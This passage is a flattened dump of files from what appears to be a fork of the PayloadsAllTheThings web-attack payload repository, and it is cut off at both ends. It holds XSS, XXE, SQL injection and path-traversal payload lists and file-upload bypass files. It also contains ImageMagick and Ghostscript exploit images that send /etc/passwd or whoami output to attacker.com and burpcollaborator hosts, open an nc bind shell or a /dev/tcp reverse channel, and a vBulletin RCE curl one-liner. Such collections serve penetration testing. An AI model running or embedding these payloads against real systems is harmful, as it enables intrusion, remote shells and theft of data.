</title><script>alert(3)</script>

├── XSS Injection ├── Files │ ├── ">

2 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/phpinfo.php: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/phpinfo.php3: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/phpinfo.php4: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/phpinfo.php5: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/phpinfo.php7: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/phpinfo.phpt: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/phpinfo.pht: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/phpinfo.phtml: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension HTML/xss.html: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/phpinfo.jpg.php: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Upload Insecure Files/Server Side Include/exec.shtml: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration Busybox httpd.conf/httpd.conf: -------------------------------------------------------------------------------- 1 | *.sh:/bin/sh 2 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/shell.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/shell.pht: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/shell.jpeg.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/shell.jpg.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/shell.phar: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/shell.php3: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/shell.php4: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/shell.php5: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/shell.php7: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/shell.phpt: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/shell.phtml: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/shell.png.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Upload Insecure Files/Server Side Include/include.shtml: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /XSS Injection/Files/SVG_XSS1.svg: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /XSS Injection/Files/xml.xsd: -------------------------------------------------------------------------------- 1 | alert(1) -------------------------------------------------------------------------------- /XSS Injection/Files/xss.dtd: -------------------------------------------------------------------------------- 1 | alert(1) -------------------------------------------------------------------------------- /XSS Injection/Files/xss.mno: -------------------------------------------------------------------------------- 1 | alert(1337) -------------------------------------------------------------------------------- /XSS Injection/Files/xss.rdf: -------------------------------------------------------------------------------- 1 | alert(1) -------------------------------------------------------------------------------- /XSS Injection/Files/xss.svgz: -------------------------------------------------------------------------------- 1 | alert(1) -------------------------------------------------------------------------------- /XSS Injection/Files/xss.vml: -------------------------------------------------------------------------------- 1 | alert(1) -------------------------------------------------------------------------------- /XSS Injection/Files/xss.wsdl: -------------------------------------------------------------------------------- 1 | alert(1) -------------------------------------------------------------------------------- /XSS Injection/Files/xss.xht: -------------------------------------------------------------------------------- 1 | alert(1) -------------------------------------------------------------------------------- /XSS Injection/Files/xss.xhtml: -------------------------------------------------------------------------------- 1 | alert(1) -------------------------------------------------------------------------------- /XSS Injection/Files/xss.xsd: -------------------------------------------------------------------------------- 1 | alert(1) -------------------------------------------------------------------------------- /XSS Injection/Files/xss.xsf: -------------------------------------------------------------------------------- 1 | alert(1) -------------------------------------------------------------------------------- /XSS Injection/Files/xss.xsl: -------------------------------------------------------------------------------- 1 | alert(1) -------------------------------------------------------------------------------- /XSS Injection/Files/xss.xslt: -------------------------------------------------------------------------------- 1 | alert(1) -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/shell.gif?shell.php: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/shell.jpg?shell.php: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/shell.png?shell.php: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /XSS Injection/Files/SVG_XSS3.svg: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /XSS Injection/Files/xss.html.demo: -------------------------------------------------------------------------------- 1 | alert(1) -------------------------------------------------------------------------------- /XSS Injection/Files/xss.url.url: -------------------------------------------------------------------------------- 1 | 2 | 3 | -------------------------------------------------------------------------------- /.github/banner.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/.github/banner.png -------------------------------------------------------------------------------- /Upload Insecure Files/EICAR/eicar.txt: -------------------------------------------------------------------------------- 1 | X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* 2 | -------------------------------------------------------------------------------- /Upload Insecure Files/CVE ZIP Symbolic Link/generate.sh: -------------------------------------------------------------------------------- 1 | ln -s /etc/passwd link 2 | zip --symlinks test.zip link 3 | -------------------------------------------------------------------------------- /XSS Injection/Files/SVG_XSS2.svg: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /SAML Injection/Images/XSLT1.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/SAML Injection/Images/XSLT1.jpg -------------------------------------------------------------------------------- /Web Sockets/Images/sqlmap.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Web Sockets/Images/sqlmap.png -------------------------------------------------------------------------------- /XSS Injection/Files/SWF_XSS.swf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/XSS Injection/Files/SWF_XSS.swf -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration Busybox httpd.conf/shellymcshellface.sh: -------------------------------------------------------------------------------- 1 | echo "Content-type: text/html" 2 | echo "" 3 | echo `id` 4 | -------------------------------------------------------------------------------- /GraphQL Injection/Images/htb-help.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/GraphQL Injection/Images/htb-help.png -------------------------------------------------------------------------------- /Server Side Request Forgery/Files/ssrf_ffmpeg.avi: -------------------------------------------------------------------------------- 1 | #EXTM3U 2 | #EXT-X-MEDIA-SEQUENCE:0 3 | #EXTINF:1.0 4 | http://ssrfevil.com 5 | #EXT-X-ENDLIST -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Resize/README.txt: -------------------------------------------------------------------------------- 1 | # How to use 2 | b.php?c=ls 3 | 4 | 5 | Source: http://www.virtualabs.fr/Nasty-bulletproof-Jpegs-l -------------------------------------------------------------------------------- /CSRF Injection/Images/CSRF-CheatSheet.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/CSRF Injection/Images/CSRF-CheatSheet.png -------------------------------------------------------------------------------- /SAML Injection/Images/SAML-xml-flaw.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/SAML Injection/Images/SAML-xml-flaw.png -------------------------------------------------------------------------------- /Web Sockets/Images/WebsocketHarness.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Web Sockets/Images/WebsocketHarness.jpg -------------------------------------------------------------------------------- /XSS Injection/Files/InsecureFlashFile.swf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/XSS Injection/Files/InsecureFlashFile.swf -------------------------------------------------------------------------------- /XSS Injection/Files/onclick-xss-ecs.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/XSS Injection/Files/onclick-xss-ecs.jpeg -------------------------------------------------------------------------------- /XSS Injection/Files/payload_text_xss.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/XSS Injection/Files/payload_text_xss.png -------------------------------------------------------------------------------- /XSS Injection/Images/DwrkbH1VAAErOI2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/XSS Injection/Images/DwrkbH1VAAErOI2.jpg -------------------------------------------------------------------------------- /XSS Injection/Files/mouseover-xss-ecs.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/XSS Injection/Files/mouseover-xss-ecs.jpeg -------------------------------------------------------------------------------- /SQL Injection/Images/PostgreSQL_cmd_exec.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/SQL Injection/Images/PostgreSQL_cmd_exec.png -------------------------------------------------------------------------------- /SQL Injection/Images/Unicode_SQL_injection.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/SQL Injection/Images/Unicode_SQL_injection.png -------------------------------------------------------------------------------- /SQL Injection/Images/wildcard_underscore.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/SQL Injection/Images/wildcard_underscore.jpg -------------------------------------------------------------------------------- /Server Side Request Forgery/Images/aws-cli.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Server Side Request Forgery/Images/aws-cli.jpg -------------------------------------------------------------------------------- /Upload Insecure Files/Extension Flash/xss.swf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Upload Insecure Files/Extension Flash/xss.swf -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/shell.pgif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Upload Insecure Files/Extension PHP/shell.pgif -------------------------------------------------------------------------------- /Web Sockets/Images/websocket-harness-start.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Web Sockets/Images/websocket-harness-start.png -------------------------------------------------------------------------------- /XXE Injection/Files/Classic XXE B64 Encoded.xml: -------------------------------------------------------------------------------- 1 | %init; ]> 2 | -------------------------------------------------------------------------------- /Server Side Request Forgery/Images/SSRF_PDF.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Server Side Request Forgery/Images/SSRF_PDF.png -------------------------------------------------------------------------------- /Insecure Direct Object References/Images/idor.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Insecure Direct Object References/Images/idor.png -------------------------------------------------------------------------------- /SQL Injection/Intruder/FUZZDB_MSSQL_Enumeration.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/SQL Injection/Intruder/FUZZDB_MSSQL_Enumeration.txt -------------------------------------------------------------------------------- /SQL Injection/Intruder/FUZZDB_MYSQL.txt: -------------------------------------------------------------------------------- 1 | 1'1 2 | 1 exec sp_ (or exec xp_) 3 | 1 and 1=1 4 | 1' and 1=(select count(*) from tablenames); -- 5 | 1 or 1=1 6 | 1' or '1'='1 7 | -------------------------------------------------------------------------------- /Server Side Request Forgery/Images/SSRF_Parser.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Server Side Request Forgery/Images/SSRF_Parser.png -------------------------------------------------------------------------------- /Server Side Request Forgery/Images/SSRF_stream.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Server Side Request Forgery/Images/SSRF_stream.png -------------------------------------------------------------------------------- /Server Side Request Forgery/Images/WeakParser.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Server Side Request Forgery/Images/WeakParser.jpg -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PDF JS/result.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Upload Insecure Files/Extension PDF JS/result.pdf -------------------------------------------------------------------------------- /Server Side Template Injection/Images/serverside.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Server Side Template Injection/Images/serverside.png -------------------------------------------------------------------------------- /Upload Insecure Files/CVE Ffmpeg HLS/read_passwd.avi: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Upload Insecure Files/CVE Ffmpeg HLS/read_passwd.avi -------------------------------------------------------------------------------- /Upload Insecure Files/CVE Ffmpeg HLS/read_shadow.avi: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Upload Insecure Files/CVE Ffmpeg HLS/read_shadow.avi -------------------------------------------------------------------------------- /Upload Insecure Files/Extension Flash/xssproject.swf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Upload Insecure Files/Extension Flash/xssproject.swf -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Resize/GIF_exploit.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Upload Insecure Files/Picture Resize/GIF_exploit.gif -------------------------------------------------------------------------------- /XSS Injection/Files/payload_in_all_known_metadata.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/XSS Injection/Files/payload_in_all_known_metadata.jpg -------------------------------------------------------------------------------- /XSS Injection/Files/payload_in_all_known_metadata.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/XSS Injection/Files/payload_in_all_known_metadata.png -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Resize/JPG_exploit-55.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Upload Insecure Files/Picture Resize/JPG_exploit-55.jpg -------------------------------------------------------------------------------- /SQL Injection/Intruder/Generic_Fuzz.txt: -------------------------------------------------------------------------------- 1 | 1 2 | 1' 3 | 1" 4 | [1] 5 | 1` 6 | 1\ 7 | 1/*'*/ 8 | 1/*!1111'*/ 9 | 1'||'asd'||' 10 | 1' or '1'='1 11 | 1 or 1=1 12 | 'or''=' -------------------------------------------------------------------------------- /Upload Insecure Files/CVE ZIP Symbolic Link/etc_passwd.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Upload Insecure Files/CVE ZIP Symbolic Link/etc_passwd.zip -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Metadata/PHP_exif_system.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Upload Insecure Files/Picture Metadata/PHP_exif_system.gif -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Metadata/PHP_exif_system.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Upload Insecure Files/Picture Metadata/PHP_exif_system.jpg -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Metadata/PHP_exif_system.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Upload Insecure Files/Picture Metadata/PHP_exif_system.png -------------------------------------------------------------------------------- /Server Side Request Forgery/Images/Parser & Curl < 7.54.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Server Side Request Forgery/Images/Parser & Curl < 7.54.png -------------------------------------------------------------------------------- /Upload Insecure Files/CVE Ffmpeg HLS/read_passwd_bypass.mp4: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Upload Insecure Files/CVE Ffmpeg HLS/read_passwd_bypass.mp4 -------------------------------------------------------------------------------- /Upload Insecure Files/CVE Ffmpeg HLS/read_shadow_bypass.mp4: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Upload Insecure Files/CVE Ffmpeg HLS/read_shadow_bypass.mp4 -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_portscan.jpg: -------------------------------------------------------------------------------- 1 | push graphic-context 2 | viewbox 0 0 640 480 3 | fill 'url(http://localhost:PORT/)' 4 | pop graphic-context 5 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Metadata/PHP_exif_phpinfo.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Upload Insecure Files/Picture Metadata/PHP_exif_phpinfo.jpg -------------------------------------------------------------------------------- /XSS Injection/Files/payload_in_all_known_exif_corrupted.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/XSS Injection/Files/payload_in_all_known_exif_corrupted.jpg -------------------------------------------------------------------------------- /XSS Injection/Files/payload_in_all_known_exif_corrupted.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/XSS Injection/Files/payload_in_all_known_exif_corrupted.png -------------------------------------------------------------------------------- /XXE Injection/Files/Classic XXE.xml: -------------------------------------------------------------------------------- 1 | 2 | 4 | 5 | ]> 6 | &file; -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_remote_connection.mvg: -------------------------------------------------------------------------------- 1 | push graphic-context 2 | viewbox 0 0 640 480 3 | fill 'url(http://IP_ATTAQUANT/)' 4 | pop graphic-context 5 | -------------------------------------------------------------------------------- /XSS Injection/Files/xss_comment_exif_metadata_double_quote.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/XSS Injection/Files/xss_comment_exif_metadata_double_quote.png -------------------------------------------------------------------------------- /XSS Injection/Files/xss_comment_exif_metadata_single_quote.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/XSS Injection/Files/xss_comment_exif_metadata_single_quote.png -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration Apache .htaccess/.htaccess_phpinfo: -------------------------------------------------------------------------------- 1 | AddType application/x-httpd-php .htaccess 2 | # 3 | SetHandler server-status 4 | SetHandler server-info 5 | 6 | -------------------------------------------------------------------------------- /XXE Injection/Files/Classic XXE - etc passwd.xml: -------------------------------------------------------------------------------- 1 | 2 | 4 | 5 | ]> 6 | &file; 7 | -------------------------------------------------------------------------------- /.github/FUNDING.yml: -------------------------------------------------------------------------------- 1 | # These are supported funding model platforms 2 | 3 | github: swisskyrepo 4 | ko_fi: swissky # Replace with a single Ko-fi username 5 | custom: https://www.buymeacoffee.com/swissky 6 | -------------------------------------------------------------------------------- /CVE Exploits/vBulletin RCE 5.0.0 - 5.5.4.sh: -------------------------------------------------------------------------------- 1 | curl https://example.com/index.php\?routestring\=ajax/render/widget_php --connect-timeout 5 --max-time 15 -s -k --data "widgetConfig[code]=echo system('id');exit;" -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_touch.jpg: -------------------------------------------------------------------------------- 1 | push graphic-context 2 | viewbox 0 0 640 480 3 | fill 'url(https://127.0.0.0/oops.jpg"|touch "rce1)' 4 | pop graphic-context 5 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Metadata/CVE-2021-22204_exiftool_echo.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Upload Insecure Files/Picture Metadata/CVE-2021-22204_exiftool_echo.jpg -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Resize/PNG_32x32_resize_bypass_use_LFI.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Upload Insecure Files/Picture Resize/PNG_32x32_resize_bypass_use_LFI.png -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/imagemagik_ghostscript_cmd_exec.pdf: -------------------------------------------------------------------------------- 1 | %!PS 2 | currentdevice null true mark /OutputICCProfile (%pipe%curl http://attacker.com/?a=$(whoami|base64) ) 3 | .putdeviceparams 4 | quit -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Metadata/CVE-2021-22204_exiftool_revshell.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Upload Insecure Files/Picture Metadata/CVE-2021-22204_exiftool_revshell.jpg -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Resize/PNG_110x110_resize_bypass_use_LFI.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Upload Insecure Files/Picture Resize/PNG_110x110_resize_bypass_use_LFI.png -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_file_exfiltration_text_wrapper.jpg: -------------------------------------------------------------------------------- 1 | push graphic-context 2 | viewbox 0 0 640 480 3 | image over 0,0 0,0 'text:/etc/passwd' 4 | pop graphic-context 5 | 6 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/imagetragik2_centos_id.jpg: -------------------------------------------------------------------------------- 1 | %!PS 2 | userdict /setpagedevice undef 3 | legal 4 | { null restore } stopped { pop } if 5 | legal 6 | mark /OutputFile (%pipe%id) currentdevice putdeviceprops -------------------------------------------------------------------------------- /Server Side Request Forgery/Files/SSRF_expect.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_file_exfiltration_pangu_wrapper.jpg: -------------------------------------------------------------------------------- 1 | push graphic-context 2 | viewbox 0 0 640 480 3 | image over 0,0 0,0 'pango:@/etc/passwd' 4 | pop graphic-context 5 | 6 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_bind_shell_nc.mvg: -------------------------------------------------------------------------------- 1 | push graphic-context 2 | viewbox 0 0 640 480 3 | fill 'url(https://example.com/image.jpg"|nc -l -p 7777 -e"/bin/sh)' 4 | pop graphic-context 5 | -------------------------------------------------------------------------------- /Server Side Request Forgery/Files/SSRF_url.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Server Side Request Forgery/Files/ssrf_svg_use.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration Python __init__.py/python-admin-__init__.py.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Upload Insecure Files/Configuration Python __init__.py/python-admin-__init__.py.zip -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration Python __init__.py/python-conf-__init__.py.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Upload Insecure Files/Configuration Python __init__.py/python-conf-__init__.py.zip -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration Python __init__.py/python-login-__init__.py.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Upload Insecure Files/Configuration Python __init__.py/python-login-__init__.py.zip -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration Python __init__.py/python-tests-__init__.py.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Upload Insecure Files/Configuration Python __init__.py/python-tests-__init__.py.zip -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration Python __init__.py/python-urls-__init__.py.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Upload Insecure Files/Configuration Python __init__.py/python-urls-__init__.py.zip -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration Python __init__.py/python-utils-__init__.py.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Upload Insecure Files/Configuration Python __init__.py/python-utils-__init__.py.zip -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration Python __init__.py/python-view-__init__.py.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Upload Insecure Files/Configuration Python __init__.py/python-view-__init__.py.zip -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration Python __init__.py/python-config-__init__.py.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Upload Insecure Files/Configuration Python __init__.py/python-config-__init__.py.zip -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration Python __init__.py/python-models-__init__.py.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Upload Insecure Files/Configuration Python __init__.py/python-models-__init__.py.zip -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration Python __init__.py/python-modules-__init__.py.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Upload Insecure Files/Configuration Python __init__.py/python-modules-__init__.py.zip -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration Python __init__.py/python-scripts-__init__.py.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Upload Insecure Files/Configuration Python __init__.py/python-scripts-__init__.py.zip -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration Python __init__.py/python-settings-__init__.py.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Upload Insecure Files/Configuration Python __init__.py/python-settings-__init__.py.zip -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_wget.gif: -------------------------------------------------------------------------------- 1 | push graphic-context 2 | viewbox 0 0 640 480 3 | image over 0,0 0,0 'https://127.0.0.1/x.php?x=`wget -O- 127.0.0.1:1337 > /dev/null`' 4 | pop graphic-context 5 | -------------------------------------------------------------------------------- /File Inclusion/Intruders/simple-check.txt: -------------------------------------------------------------------------------- 1 | etc/passwd 2 | etc/passwd%00 3 | etc%2fpasswd 4 | etc%2fpasswd%00 5 | etc%5cpasswd 6 | etc%5cpasswd%00 7 | etc%c0%afpasswd 8 | etc%c0%afpasswd%00 9 | C:\boot.ini 10 | C:\WINDOWS\win.ini -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_reverse_shell_bash.mvg: -------------------------------------------------------------------------------- 1 | push graphic-context 2 | viewbox 0 0 640 480 3 | fill 'url(https://IP_ATTAQUANT"||/bin/bash -c "ls > /dev/tcp/IP_ATTAQUANT/80)' 4 | pop graphic-context 5 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/imagetragik2_burpcollaborator_passwd.jpg: -------------------------------------------------------------------------------- 1 | push graphic-context viewbox 0 0 200 200 fill 'url(https://example.123 "|curl -d "@/etc/passwd" -X POST https://xxx.burpcollaborator.net/test1 ")' pop graphic-context -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration Python __init__.py/python-controllers-__init__.py.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alone-breecher/PayloadsAllTheThings/HEAD/Upload Insecure Files/Configuration Python __init__.py/python-controllers-__init__.py.zip -------------------------------------------------------------------------------- /Server Side Request Forgery/Files/ssrf_svg_image.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/ghostscript_rce_curl.jpg: -------------------------------------------------------------------------------- 1 | %!PS 2 | userdict /setpagedevice undef 3 | legal 4 | { null restore } stopped { pop } if 5 | legal 6 | mark /OutputFile (%pipe%curl http://attacker.com/?a=callback) currentdevice putdeviceprops -------------------------------------------------------------------------------- /Server Side Request Forgery/Files/ssrf_svg_css_import.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Upload Insecure Files/Picture Image Magik/imagetragik2_ubuntu_id.jpg: -------------------------------------------------------------------------------- 1 | %!PS 2 | userdict /setpagedevice undef 3 | save 4 | legal 5 | { null restore } stopped { pop } if 6 | { legal } stopped { pop } if 7 | restore 8 | mark /OutputFile (%pipe%id) currentdevice putdeviceprops -------------------------------------------------------------------------------- /SQL 